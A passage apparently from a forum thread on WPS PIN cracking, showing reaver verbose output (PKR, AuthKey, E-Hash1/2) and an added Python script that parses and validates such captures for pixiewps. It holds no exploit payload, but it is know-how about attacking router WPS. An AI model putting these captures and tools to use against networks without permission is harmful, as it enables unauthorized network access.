[P] PKR: f2:da:93:b1:d1:6e:89:65:e6:a4:c7:a6:c6:bf:1b:80:dc:56:c5:47:d7:09:13:ba:7e:c5:96:c4:e8:a1:59:b7:5e:bb:d9:67:b8:2a:24:7a:53:9a:e0:16:2d:e8:f0:cb:a6:fe:ab:70:82:bb:17:86:47:7d:05:de:06:b8:18:2b:79:7a:3f:75:95:06:bc:12:06:a1:64:45:00:3c:0a:da:c9:0b:b8:22:31:e6:54:d0:83:a5:88:45:f9:13:0f:3f:82:de:22:9f:04:e1:26:93:2c:49:22:00:2d:7b:74:4e:a0:29:16:a3:96:c8:08:6b:5f:c0:eb:89:49:5c:1f:d0:a7:cf:33:c5:70:65:cc:1d:dc:f9:c4:7b:28:68:03:a2:5a:71:21:c4:0b:80:13:44:3c:e0:9b:be:17:7a:94:6a:9c:00:f2:8c:de:96:09:51:97:57:4b:bd:17:cf:b7:fe:8d:c1:9c:05:85:29:7a:ff:87:81:59:02:97:0f:f3:0d
[P] AuthKey: b4:20:25:cc:17:81:35:11:da:37:21:aa:5b:2c:21:02:17:a0:6a:0c:d1:1c:c0:21:5e:9a:a6:ca:8e:b2:32:b8
[P] E-Hash1: 02:31:ef:e0:30:00:9b:28:db:18:b6:1b:77:5d:b7:20:fb:0c:8a:b5:7e:41:85:33:dd:83:ae:94:4f:7a:5a:fe
[P] E-Hash2: 61:39:79:0c:67:a7:c3:2f:b0:10:98:5e:16:61:7b:e0:a6:a8:73:1f:84:bb:78:34:0c:22:64:03:cb:cc:f0:73
Last edited by someone_else; 2015-04-20 at 08:55. Reason: Failure in Model-Number
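An added example, not code from reaver, pixiewps or any poster in this thread: a small Python parser for the [P] signature lines in the dumps above. It drops the spaces the forum wrap inserts into the hex, checks that each field has the byte length the WPS exchange gives it, and notes when PKR is the small-DH-key constant reaver sends with -S. The sample dump is constructed, not a real capture.

```python
import re

# Byte lengths of the WPS fields reaver -vv prints on its "[P]" lines:
# E-Nonce 16, PKE/PKR 192 (1536-bit DH public keys), AuthKey 32, E-Hash1/2 32 (HMAC-SHA-256).
FIELD_LENGTHS = {"E-Nonce": 16, "PKE": 192, "PKR": 192,
                 "AuthKey": 32, "E-Hash1": 32, "E-Hash2": 32}

# One "[P] <name>: <hex run>" field; the run ends at the next "[...]" tag or end of line.
FIELD_RE = re.compile(
    r"\[P\]\s+(E-Nonce|PKE|PKR|AuthKey|E-Hash1|E-Hash2):\s*([0-9a-fA-F: ]+?)(?=\s*\[|$)",
    re.MULTILINE)

# reaver -S uses a tiny DH private key, so the registrar public key it sends is 0x00...0002.
SMALL_DH_PKR = b"\x00" * 191 + b"\x02"

def parse_signature(dump):
    """Return {field: bytes} from a reaver -vv dump (one flattened line or many lines).
    Stray spaces inside the hex runs (forum line-wrap damage) are dropped."""
    sig = {}
    for name, hexrun in FIELD_RE.findall(dump):
        sig[name] = bytes.fromhex(hexrun.replace(" ", "").replace(":", ""))
    return sig

def check_signature(sig):
    """List what is wrong with a parsed signature; an empty list means it is complete."""
    problems = []
    for name, want in FIELD_LENGTHS.items():
        if name not in sig:
            problems.append(f"missing {name}")
        elif len(sig[name]) != want:
            problems.append(f"{name} is {len(sig[name])} bytes, expected {want}")
    return problems

def small_dh_registrar(sig):
    """True when the capture was taken with reaver -S (PKR is the small-key constant)."""
    return sig.get("PKR") == SMALL_DH_PKR

def _hexrun(b):
    return ":".join(f"{x:02x}" for x in b)

# Constructed sample dump (synthetic values, not a real capture): a space is injected into
# PKE to mimic the wrap damage seen in forum pastes, and PKR is the reaver -S constant.
_pke = _hexrun(bytes(range(192)))
SAMPLE_DUMP = "\n".join([
    "[P] E-Nonce: " + _hexrun(bytes(range(16))),
    "[P] PKE: " + _pke[:50] + " " + _pke[50:],
    "[P] WPS Manufacturer: Example Vendor",
    "[P] PKR: " + _hexrun(SMALL_DH_PKR),
    "[P] AuthKey: " + _hexrun(bytes(range(32))),
    "[P] E-Hash1: " + _hexrun(bytes([0x11] * 32)),
    "[P] E-Hash2: " + _hexrun(bytes([0x22] * 32)),
])
```

Feeding it the flattened "Code:" signatures above (one model per call) gives a quick way to spot a paste that lost a field or some hex before it is posted.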